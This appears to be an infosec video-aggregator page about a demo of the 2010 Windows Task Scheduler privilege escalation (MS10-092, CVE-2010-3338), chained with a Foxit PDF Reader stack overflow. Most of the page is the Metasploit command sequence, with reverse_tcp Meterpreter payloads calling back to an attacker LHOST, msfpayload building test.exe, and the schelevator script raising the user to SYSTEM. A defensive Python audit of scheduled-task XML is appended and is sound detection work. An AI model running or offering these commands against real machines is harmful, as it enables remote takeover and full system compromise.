Timeline:
webDEViL 0day released on Exploit-DB on 2010-11-20
Metasploit exploit released on 2010-11-20
Provided by:
webDEViL
jduck
References:
EDB-ID-15589
MS10-092
CVE-2010-3338
Affected versions:
Should work on Vista/Win7/2008 x86/x64
Tested on Windows 7 Integral
Description:
We will give you a demo of the brand-new Microsoft 0day called "Windows Task Scheduler Privilege Escalation 0day", aka EDB-ID-15589 on Exploit-DB. This 0day is not yet patched.
To demonstrate a real privilege escalation, we will first exploit the Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow from corelan. The user who opens the PDF file is a Windows 7 Standard User. After getting access to the Standard User session, we will escalate our privileges to the NT AUTHORITY\SYSTEM account to gain complete control of the box.
Note that the Meterpreter script currently provided with Metasploit still has some bugs and will not work on a non-English-language operating system. The Metasploit team is working on the bugs.
Metasploit demo:
Foxit PDF Reader exploitation
use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
getprivs
Creating a test.exe containing a reverse_tcp meterpreter payload
sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.178.21 X test.exe
Launching a second multi/handler listener with msfcli
sudo msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.178.21 E
Running schelevator to gain system privileges
run schelevator -u test.exe
getuid
getprivs
Owned
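A defender-side check, added here as an example and not part of the original video or of Metasploit's schelevator script: the escalation above ends with a scheduled task running a standard user's test.exe as SYSTEM, so reviewing the task definitions stored under %SystemRoot%\System32\Tasks for a SYSTEM principal paired with a non-privileged author or a command inside a user profile is a practical audit. The two task XML samples, the trusted-author allowlist and the heuristic itself are constructed assumptions for this example.

```python
import xml.etree.ElementTree as ET

# Namespace of Task Scheduler 2.0 task definition files (stored under %SystemRoot%\System32\Tasks).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Ways a task principal can name the LocalSystem account.
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}

def audit_task(name, xml_text, trusted_authors=("NT AUTHORITY\\SYSTEM", "Microsoft Corporation")):
    """Return findings for one task definition; an empty list means nothing suspicious.

    Heuristic (an assumption for this example, not a published detection rule): a task
    that runs as SYSTEM but was registered by an ordinary user, or whose action lives in
    a user profile, has the shape a Task Scheduler privilege escalation leaves behind.
    """
    root = ET.fromstring(xml_text)
    author = root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=NS).strip()
    runs_as_system = any(
        p.findtext("t:UserId", default="", namespaces=NS).strip() in SYSTEM_IDS
        for p in root.findall("t:Principals/t:Principal", NS)
    )
    findings = []
    if not runs_as_system:
        return findings
    if author not in trusted_authors:
        findings.append(f"{name}: runs as SYSTEM but was authored by '{author or '<none>'}'")
    for cmd in root.findall("t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip().strip('"')
        if path.lower().startswith("c:\\users\\"):
            findings.append(f"{name}: runs as SYSTEM and executes a user-profile binary {path}")
    return findings

# Constructed sample task files (not captured from a real system).
BENIGN_TASK = r'''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>%SystemRoot%\system32\defrag.exe</Command></Exec></Actions>
</Task>'''

SUSPICIOUS_TASK = r'''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>WIN7\standarduser</Author></RegistrationInfo>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Users\standarduser\test.exe</Command></Exec></Actions>
</Task>'''

if __name__ == "__main__":
    for task_name, xml in (("Defrag", BENIGN_TASK), ("Updater", SUSPICIOUS_TASK)):
        for finding in audit_task(task_name, xml) or [f"{task_name}: ok"]:
            print(finding)
```

On a live host the same function can be run over every file under %SystemRoot%\System32\Tasks; a task flagged on both signals deserves a look at who created it and when.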
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.